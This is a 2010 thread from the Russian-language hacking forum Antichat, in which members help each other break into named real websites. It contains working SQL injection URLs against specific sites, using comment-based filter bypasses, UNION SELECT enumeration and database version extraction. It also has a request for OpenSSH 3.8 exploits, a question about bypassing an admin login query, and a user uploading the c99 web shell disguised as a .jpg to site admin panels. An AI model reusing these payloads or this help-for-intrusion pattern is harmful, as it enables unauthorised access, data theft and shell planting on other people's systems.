ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
18.07.2010, 21:18
|
|
Guest
Сообщений: n/a
Провел на форуме:
0
Репутация:
0
|
|
Exploit for OpenSSH 3.8
Ребят, под эту версию есть какие нибудь эксплоиты? весь гугл перерыл - ничего дельного не нашел =(
|
|
|
|
18.07.2010, 21:52
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
Сообщение от auth_root
auth_root said:
Прочитал статейку про обход фильтрации, но ни один приведённый способ не помог.Не смог применить на практике, но часто встречаюсь. Поэтому материал не усвоил =)
Хотелось бы на живом примере. Вот нашел сайт, вроде подходящий.
http://aktualnews.com/sport/?id=764'
select%20 или (+) c пробелом фильтруется (Forbidden), с /**/ запрос проходит.
Версия 5.0.90-community
http://aktualnews.com/sport/?id=-764/**/union/**/select/**/1,2,version(),4,5--+
Имена таблиц из information_schema.tables получить не могу, т.к. from фильтруется тоже. Вот как его обойти и хотелось бы увидеть на примере.
возможно просто нет доступа к information_schema.tables, но я с таким ещё не встречался.Поэтому мне кажется дело в фильтрации,но я могу и ошибаться.
_http://aktualnews.com/sport/?id=-764/**/union/**/select/**/1,2,3,4,5/**/FrOm/**/information_schema.`tables`--+
|
|
|
19.07.2010, 01:00
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Как можно попасть в админку, если есть запрос при авторизации
SELECT pass FROM user WHERE username = '[SQL]'
Этиим запросом достается пароль и сверяется с тем паролем, что я ввел, поэтому "or 1=1--" и прочее не подходит.
|
|
|
|
19.07.2010, 01:36
|
|
Участник форума
Регистрация: 29.11.2007
Сообщений: 116
Провел на форуме:
283596
Репутация:
88
|
|
Не удается подобрать поля
Сообщение от None
http://www.arbeitsmarktportal.eu/stellengesuche4.php?Bundesland=Baden-W%FCrttemberg&AktuelleSeite=%2527
Помогите плиз справится |
|
|
|
19.07.2010, 01:50
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от AKYLA
AKYLA said:
Не удается подобрать поля
Помогите плиз справится
http://www.arbeitsmarktportal.eu/stellengesuche-anzeigen.php?recordID=1816+UNION+SELECT+1,2,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,27,28,29,30,31,32,33,34,35,36,unhex(hex(v ersion()),38,39,40,41,42,43,44,45+LIMIT+1,1--
Database Version: 4.1.13
|
|
|
|
19.07.2010, 05:56
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от AKYLA
AKYLA said:
Не удается подобрать поля
Помогите плиз справится
если не получается в одном скрипте реализовать sql, то ищи другие скрипты и пробуй реализовать там, как впринцепи и зделал Gorev
|
|
|
|
19.07.2010, 08:06
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от попугай
попугай said:
Как можно попасть в админку, если есть запрос при авторизации
SELECT pass FROM user WHERE username = '
[SQL]
'
Этиим запросом достается пароль и сверяется с тем паролем, что я ввел, поэтому "or 1=1--" и прочее не подходит.
а поконкретней код как устроен?
|
|
|
|
19.07.2010, 14:54
|
|
Участник форума
Регистрация: 25.09.2009
Сообщений: 147
Провел на форуме:
1768674
Репутация:
65
|
|
переименовал шелл c99.php на c99.php.jpg
попробовал уже на 2х админках, не заливается выдает ошибку что не тот формат можт че не так или админ сильно умный
|
|
|
|
19.07.2010, 15:01
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от KENT1994
KENT1994 said:
переименовал шелл c99.php на c99.php.jpg
попробовал уже на 2х админках, не заливается выдает ошибку что не тот формат
можт че не так или админ сильно умный
конечно же все зависит от скрипта через который происходит заливка, не все же скрипты проверяют расширение...у некоторых есть и другие способы защиты от заливки нежелательных файлов
тыц мышкой
|
|
|
|
19.07.2010, 15:02
|
|
Участник форума
Регистрация: 25.09.2009
Сообщений: 147
Провел на форуме:
1768674
Репутация:
65
|
|
еще вопрос , залил все таки шелл c99.php.jpg , но страница не отображается
пишет 403
http://www.site.org/docs/c99madshell.php.jpg
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?2256761){kind=avatar}
Похожие темы
Линейный вид
